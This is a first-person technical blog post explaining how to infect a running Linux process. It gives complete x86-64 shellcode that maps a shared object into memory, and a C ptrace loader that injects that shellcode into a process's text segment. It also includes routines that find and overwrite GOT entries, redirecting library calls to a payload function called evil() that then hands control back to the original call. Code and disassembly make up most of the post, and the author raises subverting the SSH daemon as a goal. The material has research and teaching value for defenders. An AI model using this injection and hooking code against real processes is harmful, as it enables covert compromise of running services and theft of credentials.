Runtime Process Infection via PLT/GOT Redirection

Background

If you don't care about how I ended up going down this rabbit hole, then feel free to skip this entire section and start here.

This is my first attempt at writing a technical piece of work, so please take that into consideration when reading through this document.Just to give you some insight into how I fell into this rabbit hole and started to learn about UNIX viruses, reverse engineering, and the enormous amount of other mind bamboozling things that come along the way, I thought that I'd share a little story with you. Feel free to skip over this section if you don't like stories, but I thought it was a rather interesting how I've come from not knowing anything about Linux infection techniques to someone that has developed a basic understanding on this particular topic in addition to some of the interrelated topics that come with learning about Linux viruses and binary analysis.

Towards the end of 2017 my colleague (@steve2) and I were discussing stuff at work, as you normally do. The topic of "breaking into things" arose, and by the term "things", we were literally referring to compromising systems and how attackers use their strategies and techniques to essentially "steal credentials" and "own shit". Honestly speaking, I've never exploited a system or network and even if I have, I necessarily wouldn't confess it on here. Anyway, my colleague (@steve2) who has an extensive amount of knowledge on computer security asked me a very simple question, it was along the lines of "How would you go about changing changing your shell environment variable that has been initialized to be READONLY?". I replied "I don't know, but let me think about it and I'll get back to you". As an enthusiastic security engineer, I went away and started brainstorming about all the different ways I could achieve this. On the train commute home, I could only think about using a debugger and some how attaching myself to the shell process and altering the memory contents, or either invoking a function that would unset the environment variable that I specified. But how? I didn't know how to use a debugger effectively nor could I comprehend what disassembled binary even looks like, or how the Linux kernel loads the different programs segments into memory. At that point I come to terms with the fact that it's going to be a steep learning curve, and I yet have a lot to learn. I didn't end up solving the problem that very same evening. The following day my colleague asked "Did you manage to solve that little exercise we spoke about yesterday?", I simply responded with "No" feeling rather embarrassed.

The conversation then spiralled off into something completely random and eventually returning back with another question, which was along the lines of "Have you ever heard of ptrace?". Again, I responded with "Eh, no" and at this point I really felt embarrassed, because I felt as though I should already know about all these wonderful "utilities" and how to effectively use them. He responded and it was something along the lines of "Dude, literally go and read the man page for the ptrace system call". I replied "Sure, no worries" and went to enter `man ptrace` into one of my shells. All it took was for me to read the very first sentence, which is along the lines of "The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "tracee"), and examine and change the tracee's memory and registers.". At this point, my mind was literally stuck in a endless loop where each iteration was a new idea on how I could use this system call to do some really "interesting" things. One of the first things that came to my mind was how on earth could I subvert the SSH daemon into doing something that it was never designed to do.

Parasite Loader

The assembly code provided below, once assembled and linked, is what we commonly refer to as "shellcode". Shellcode is typically a sequence of self contained machine instructions that must be ready to take control of the processor regardless of the current processor state. The term "shellcode" does not necessarily mean and that the purpose of the instructions is to spawn a shell per se, but rather has become a more generic term used to describe a segment of position independent code that can executed directly by the CPU.

When shell code is injected into a running process, it takes over like a biological virus inside a body and this is exactly what the below assembly code has been designed to do but in the context of computer programs. The primary objective of the shellcode below is to map a shared object file into the process that executes it. The technique used within this shellcode relies on two system calls open() and mmap() in order to load the shared object file into memory. Although this is a simple, clean, and effective means of loading your parasite code into a program image, it does have its drawbacks. The problem with this technique is that most shared libraries you'd want to load require relocations in order to execute correctly, so in order for the shared library to work using this simple method you will need to write the code so that it is completely position-independent. Within some of my upcoming posts I'm looking to explore how to use the wrapper functions such as __libc_dlopen_mode() and __libc_dlsym() made available within GLIBC so that the dynamic linker can be invoked from the program and have it perform all the relocations.

I've detailed the path of execution for the parasite loader below and have provided the assembler code and disassemblies for reference.

Use the short relative JMP instruction to transfer control to the instruction referenced by the label 'do_call'.
```
jmp short do_call
                    
```
Branch to the procedure location referenced by the 'jmp_back' label. The use of the CALL instruction here ensures that the value of the RIP register, which in this case is the offset of the instruction following the CALL instruction is pushed onto the stack. The offset address in this particular instance contains the string constant that represents the absolute path of the file to be mappeed into the program image address space.
```
call jmp_back
library: db "/lib/library.so.1.0", 00
                    
```
Prepare the registers with the values required for the sys_open system call and pass control to the kernel by issuing the 'syscall' instruction. The use of the POP instruction here is to obtain the offset address of the string constant.
```
pop rdi
xor rsi, rsi
xor rax, rax
mov al, 0x2
syscall
                    
```

Prepare the registers with the values required for the sys_mmap system call and again pass control to the kernel by issuing the 'syscall' instruction.

xor rdi, rdi
xor rsi, rsi
mov si, 0x2000
xor rdx, rdx
mov dl, 0x7
xor r10, r10
mov r10b, 0x2
xor r8, r8
mov r8b, al
xor r9, r9
xor rax, rax
mov al, 0x9
syscall

Finish with an 'int3' instruction so that the process which the shellcode is executing in sends a signal - SIGTRAP. This allows the attached program to take back control and restore execution.
```
int3
                    
```

The complete assembly source code for the parasite loader is provided below.

    ; Assembly code that invokes the Linux sys_open and sys_mmap system calls in
    ; order to inject the shared object into a processes address space.
    ;
    ; Author: Matthew Bobrowski
    ; Build:
    ;     nasm -f elf64 parasite.asm
    ;     ld -o parasite parasite.o
    section .text
        ; The _start symbol must be declared for the linker program (ld)
        global _start
    _start:
        ; Small nop-sled used as a safe-guard when diverting execution
        nop
        nop
        nop
        nop
        jmp short do_call
    jmp_back:
        ; Prepare arguments for the sys_open system call
        ; - rdi: pointer to string
        ; - rsi: file access mode (O_RDONLY)
        ; - rax: system call number (sys_open)
        pop rdi
        xor rsi, rsi
        xor rax, rax
        mov al, 0x2

        ; Execute the sys_open system call
        syscall

        ; Prepare arguments for the sys_mmap system call
        ; - rdi: starting address of mapped file (NULL, allow kernel to choose)
        ; - rsi: length of bytes starting at offset (8192 bytes)
        ; - rdx: protection of mapping (PROT_EXEC | PROT_READ | PROT_WRITE)
        ; - r10: mapped memory visibility (MAP_PRIVATE)
        ; - r8:  file descriptor returned by sys_open
        ; - r9:  starting offset (0)
        ; - rax: sys_mmap
        xor rdi, rdi
        xor rsi, rsi
        mov si, 0x2000
        xor rdx, rdx
        mov dl, 0x7
        xor r10, r10
        mov r10b, 0x2
        xor r8, r8
        mov r8b, al
        xor r9, r9
        xor rax, rax
        mov al, 0x9

        ; Execute the sys_mmap system call
        syscall

        ; Signal (SIGTRAP) a breakpoint to the debugger to restore execution
        int3
    do_call:
        call jmp_back
        library: db "/lib/library.so.1.0", 00

Below is the disassembly of the compiled source code above.

    parasite:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000400080 <_start>:
    400080:   eb 31                   jmp    4000b3

    0000000000400082 :
    400082:   5f                      pop    rdi
    400083:   48 31 f6                xor    rsi,rsi
    400086:   48 31 c0                xor    rax,rax
    400089:   b0 02                   mov    al,0x2
    40008b:   0f 05                   syscall
    40008d:   48 31 ff                xor    rdi,rdi
    400090:   48 31 f6                xor    rsi,rsi
    400093:   66 be 00 20             mov    si,0x2000
    400097:   48 31 d2                xor    rdx,rdx
    40009a:   b2 07                   mov    dl,0x7
    40009c:   4d 31 d2                xor    r10,r10
    40009f:   41 b2 02                mov    r10b,0x2
    4000a2:   4d 31 c0                xor    r8,r8
    4000a5:   41 88 c0                mov    r8b,al
    4000a8:   4d 31 c9                xor    r9,r9
    4000ab:   48 31 c0                xor    rax,rax
    4000ae:   b0 09                   mov    al,0x9
    4000b0:   0f 05                   syscall
    4000b2:   cc                      int3

    00000000004000b3 :
    4000b3:   e8 ca ff ff ff          call   400082

    00000000004000b8 :
    4000b8:   2f                      (bad)
    4000b9:   6c                      ins    BYTE PTR es:[rdi],dx
    4000ba:   69 62 2f 6c 69 62 72    imul   esp,DWORD PTR [rdx+0x2f],0x7262696c
    4000c1:   61                      (bad)
    4000c2:   72 79                   jb     40013d
    4000c4:   2e 73 6f                cs jae 400136
    4000c7:   2e 31 2e                xor    DWORD PTR cs:[rsi],ebp
    4000ca:   30 00                   xor    BYTE PTR [rax],al
    ^         ^                       ^
    Address   Opcode / Instruction    Assembly

Execution Diversion

This section explores how to inject the shellcode and divert the execution of the running process to code that we control. The code injection and execution diversion techniques discussed here are acheived by using the ptrace system call made available on Unix and Unix-like operating systems. In essence, ptrace is a versatile and rather complex interface that allows one process to control the execution of another and to peek and poke at its innards. I'll only be covering a subset of the ptrace system call control mechanisms within this document, so for those who are curious minded and are interested to see what else the ptrace system call is capable of and how it pertains to working with process images, I'd highly encourage you to read through the ptrace man page.

Prior to being able to execute the shellcode and have the process load the shared object file into its address space, we need to inject the loader into the process image. The stack may potentially work for this purpose, however some systems enforce protection mechanisms on the stack portion of the process's virtual address space marking it non-executable, so that attack code injected onto the stack cannot be executed. In Linux kernels that are not patched with PaX the default bahaviour for ptrace is such that it permits the tracer to write to memory segments that have been loaded as non-writable. Seeing as though the Linux kernel that I'm currently working on hasn't had the PaX patches applied, it would be wise to use the text segment and overwrite the first sizeof(shellcode) with our shellcode starting at the base address 0x400000. This is the default base address of the text segment for an ELF built for x86_64 platforms.

Upon attaching to the process via PTRACE_ATTACH, the following steps need to be performed:

call PTRACE_PEEKTEXT passing in the base address 0x400000 and a pointer to a buffer so that the original code can be saved prior to injecting the paraiste loader shellcode.
call PTRACE_POKETEXT passing in the base address 0x400000 and a pointer to the parasite loader shellcode so that it can be copied to tracee's text segment.
call PTRACE_GETREGS to obtain the 'current' set of registers and save them to a structure of user_regs_struct type so that they can be restored at a later point.
set the rip register to the value of 0x400000 + sizeof(syscall instruction) (the start of our injected shellcode).
call PTRACE_SETREGS passing in the updated registers structure.
call PTRACE_CONT in order to continue the execution of the tracee process and call wait() to watch for SIGTRAP signals from the tracee process.
- if the tracee signals anything other than SIGTRAP, continue executing, otherwise proceed with restoring the tracee process.
call PTRACE_POKETEXT passing in the base address and a pointer to the buffer containing the original code so that we can replace our injected code with the original program code.
call PTRACE_SETREGS passing in the saved user_regs_struct with the original register values so that execution can be restored.
call PTRACE_DETACH in order restart the stopped process. At this stage you've successfully divereted and reverted execution.

The source code below is the implementation of the above diversion and restoration procedure.

    static long
    loader(pid_t pid)
    {
        long base;
        int status;
        long buffer[16];
        unsigned char *p;
        unsigned char text[128];
        unsigned long offset = 0x400000;
        struct user_regs_struct registers;

        unsigned long rip;
        unsigned long rax;
        unsigned long rdx;
        unsigned long rsi;
        unsigned long rdi;
        unsigned long r8;
        unsigned long r9;
        unsigned long r10;

        ptrace_peektext(pid, offset, buffer, 128);

        p = (unsigned char *) buffer;
        memcpy(text, p, 128);

        ptrace_poketext(pid, offset, (long *) shellcode, sizeof(shellcode));

        if (ptrace(PTRACE_GETREGS, pid, NULL, ®isters) == -1) {
            perror("ptrace(PTRACE_GETREGS)");
            exit(EXIT_FAILURE);
        }

        rip = registers.rip;
        rax = registers.rax;
        rdx = registers.rdx;
        rsi = registers.rsi;
        rdi = registers.rdi;
        r8 = registers.r8;
        r9 = registers.r9;
        r10 = registers.r10;

        registers.rip = offset + 2;

        if (ptrace(PTRACE_SETREGS, pid, NULL, ®isters) == -1) {
            perror("ptrace(PTRACE_SETREGS)");
            exit(EXIT_FAILURE);
        }

        if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) {
            perror("ptrace(PTRACE_CONT)");
            exit(EXIT_FAILURE);
        }

        do {
            wait(&status);
        } while (WIFSTOPPED(status) && WSTOPSIG(status) != SIGTRAP);

        if (ptrace(PTRACE_GETREGS, pid, NULL, ®isters) == -1) {
            perror("ptrace(PTRACE_GETREGS)");
            exit(EXIT_FAILURE);
        }

        ptrace_poketext(pid, offset, (long *) text, 128);

        base = registers.rax;

        registers.rip = rip;
        registers.rax = rax;
        registers.rdx = rdx;
        registers.rsi = rsi;
        registers.rdi = rdi;
        registers.r8 = r8;
        registers.r9 = r9;
        registers.r10 = r10;

        if (ptrace(PTRACE_SETREGS, pid, NULL, ®isters) == -1) {
            perror("ptrace(PTRACE_SETREGS)");
            exit(EXIT_FAILURE);
        }

        return base;
    }

Poisoning the GOT

This section provides the semantic details on how the shared library functions that are referenced within the programs text segment can be hijacked. The GOT is a section that resides within the data segment of the program image. It is a table predominantly comprised of function pointers to shared library functions that have been resolved by the dynamic linking process. Typically, the GOT is writable, which means that it is both attractive and practical for an attacker to overwrite a function pointer GOT entry with an address to their code. Upon successfully modifying the the GOT entry, next time the shared library function is called within the program you could expect the control flow to be redirected to something other than the original shared library function. You may potentially be thinking about whether there are mitigation techniques available to harden the data sections within a process image. There certainly is, and the technique can be referred to as RELRO (read-only relocation). I'm not going to cover this within this document, however I encourage you to read about it as it is certainly interesting and something to be aware of.

Firstly, in order to patch the GOT entry with the address of our code, we need to determine the name of the shared library function we would like to hijack and find the correlated offset address of the GOT entry. If we look at the structure of a relocation entry we can see that it provides two useful fields labelled 'r_offset' and 'r_info'. In this particular instance the value of the 'r_offset' field provides the virtual memory address that the dynamic linker used to perform the necessary relocation action, and the 'r_info' field provides a means of obtaining the correlated symbol from the symbol table via the helper routine ELF64_R_SYM((i) >> 8). The function below iterates through each of the relocation entries that are found within the DT_JMPREL. On each relocation entry the associated symbol is obtained from DT_SYMTAB using the 'r_info' field and checked against the shared library function name provided to it as an argument. If there is a match, the 'r_offset' value is returned back to the caller.

    static Elf64_Addr
    relocation_offset(pid_t pid, const char *name, Elf64_Addr address)
    {
        int i, count;
        Elf64_Addr base;
        Elf64_Addr relocs;
        Elf64_Addr symtab;
        Elf64_Addr strtab;
        Elf64_Xword size;
        Elf64_Dyn *dyn;
        Elf64_Rela *rela;
        Elf64_Ehdr *e_hdr;
        Elf64_Phdr *p_hdr;

        base = address;
        dyn = malloc(sizeof(Elf64_Dyn));
        rela = malloc(sizeof(Elf64_Rela));
        e_hdr = malloc(sizeof(Elf64_Ehdr));
        p_hdr = malloc(sizeof(Elf64_Phdr));

        ptrace_peektext(pid, base, e_hdr, sizeof(Elf64_Ehdr));

        base += e_hdr->e_phoff;

        do {
            ptrace_peektext(pid, base, p_hdr, sizeof(Elf64_Phdr));
            base += sizeof(Elf64_Phdr);
        } while (p_hdr->p_type != PT_DYNAMIC);

        base = p_hdr->p_vaddr;

        do {
            ptrace_peektext(pid, base, dyn, sizeof(Elf64_Dyn));

            switch (dyn->d_tag) {
                case DT_SYMTAB:
                    symtab = dyn->d_un.d_ptr;
                    break;
                case DT_STRTAB:
                    strtab = dyn->d_un.d_ptr;
                    break;
                case DT_PLTRELSZ:
                    size = dyn->d_un.d_val;
                    break;
                case DT_JMPREL:
                    relocs = dyn->d_un.d_ptr;
                    break;
                default:
                    break;
            }

            base += sizeof(Elf64_Dyn);
        } while (dyn->d_tag != DT_NULL);

        i = 0;
        count = size / sizeof(Elf64_Rela);

        do {
            int index;
            char buff[40];
            Elf64_Sym symbol;

            ptrace_peektext(pid, relocs, rela, sizeof(Elf64_Rela));

            index = ELF64_R_SYM(rela->r_info);
            ptrace_peektext(pid, (symtab + (index * sizeof(Elf64_Sym))),
                    &symbol, sizeof(Elf64_Sym));

            ptrace_peektext(pid, strtab + symbol.st_name, buff,
                    sizeof(buff));

            if (strcmp(name, buff) == 0) {
                return rela->r_offset;
            }


            i++;
            relocs += sizeof(Elf64_Rela);
        } while (i < count);

        return 0;
    }

Once the offset address of the relocation entry is returned by this function, the associated GOT entry for this shared library call can be patched accordingly. We can simply use ptrace(PTRACE_POKETEXT, ...) in order to perform this update i.e.

    ptrace_poketext(pid, reloc, &patch, sizeof(Elf64_Addr));

Patching Transfer Code

Prior to updating the GOT entry function pointer address, it is imperative that the current function pointer stored in that address location is stored away for later use. It is highly likely that the address that resides in that location prior to the manual overwrite is the dynamically resolved function pointer address populated by the dynamic linker itself.

Once control has been passed to the arbitrary function, we need to implement a mechanism that will allow us to pass execution back to the original shared library function. The malicious code has been designed to include a function pointer stub, which is intended to be replaced with the address of the original function.

    static long
    evil()
    {
        char value[10];

        value[0] = 'I';
        value[1] = 'n';
        value[2] = 'f';
        value[3] = 'e';
        value[4] = 'c';
        value[5] = 't';
        value[6] = 'e';
        value[7] = 'd';
        value[8] = '\0';

        long (*original)(char *buffer) = 0x7fffffffffff;
        original(value);
    }

Locate the sequence of bytes that are to be patched by looking at the function disassembly.

    library.so.1.0:     file format elf64-x86-64


    Disassembly of section .text:

    0000000000000211 :
     211:   55                      push   rbp
     212:   48 89 e5                mov    rbp,rsp
     215:   48 83 ec 20             sub    rsp,0x20
     219:   c6 45 e0 49             mov    BYTE PTR [rbp-0x20],0x49
     21d:   c6 45 e1 6e             mov    BYTE PTR [rbp-0x1f],0x6e
     221:   c6 45 e2 66             mov    BYTE PTR [rbp-0x1e],0x66
     225:   c6 45 e3 65             mov    BYTE PTR [rbp-0x1d],0x65
     229:   c6 45 e4 63             mov    BYTE PTR [rbp-0x1c],0x63
     22d:   c6 45 e5 74             mov    BYTE PTR [rbp-0x1b],0x74
     231:   c6 45 e6 65             mov    BYTE PTR [rbp-0x1a],0x65
     235:   c6 45 e7 64             mov    BYTE PTR [rbp-0x19],0x64
     239:   c6 45 e8 00             mov    BYTE PTR [rbp-0x18],0x0
     23d:   48 b8 ff ff ff ff ff    movabs rax,0x7fffffffffff
     244:   7f 00 00
     247:   48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
     24b:   48 8d 55 e0             lea    rdx,[rbp-0x20]
     24f:   48 8b 45 f8             mov    rax,QWORD PTR [rbp-0x8]
     253:   48 89 d7                mov    rdi,rdx
     256:   ff d0                   call   rax
     258:   c9                      leave
     259:   c3                      ret

After the byte sequence "\xe8\x00\x48\xb8" in the above dissasembly we patch the stub with original function address. In the code below once the signature is located we patch the code at (offset + i) using ptrace(PTRACE_POKETEXT, ...).

    static int
    patch_function(pid_t pid, Elf64_Addr offset, Elf64_Addr address)
    {
        int i, len;
        uint8_t buff[80];
        uint8_t transfer[] = "\xe8\00\x48\xb8";

        ptrace_peektext(pid, offset, buff, sizeof(buff));

        for (i = 0, len = sizeof(buff); i < len; i++) {
            if (buff[i] == transfer[0] && buff[i + 1] == transfer[1] &&
                buff[i + 2] == transfer[2] && buff[i + 3] == transfer[3]) {
                ptrace_poketext(pid, (offset + i) + 4, &address,
                        sizeof(Elf64_Addr));
                return 0;
            }
        }

        return -1;
    }

Now that there is means of diverting execution through a hijacked shared library function and passing execution back, we can safely detach from the tracee process and allowed it to continue.

    ptrace(PTRACE_DETACH, pid, NULL, NULL);

I'd like to thank both @elfmaster and @silviocesare for the phenomenal work they've done in the Linux virus space.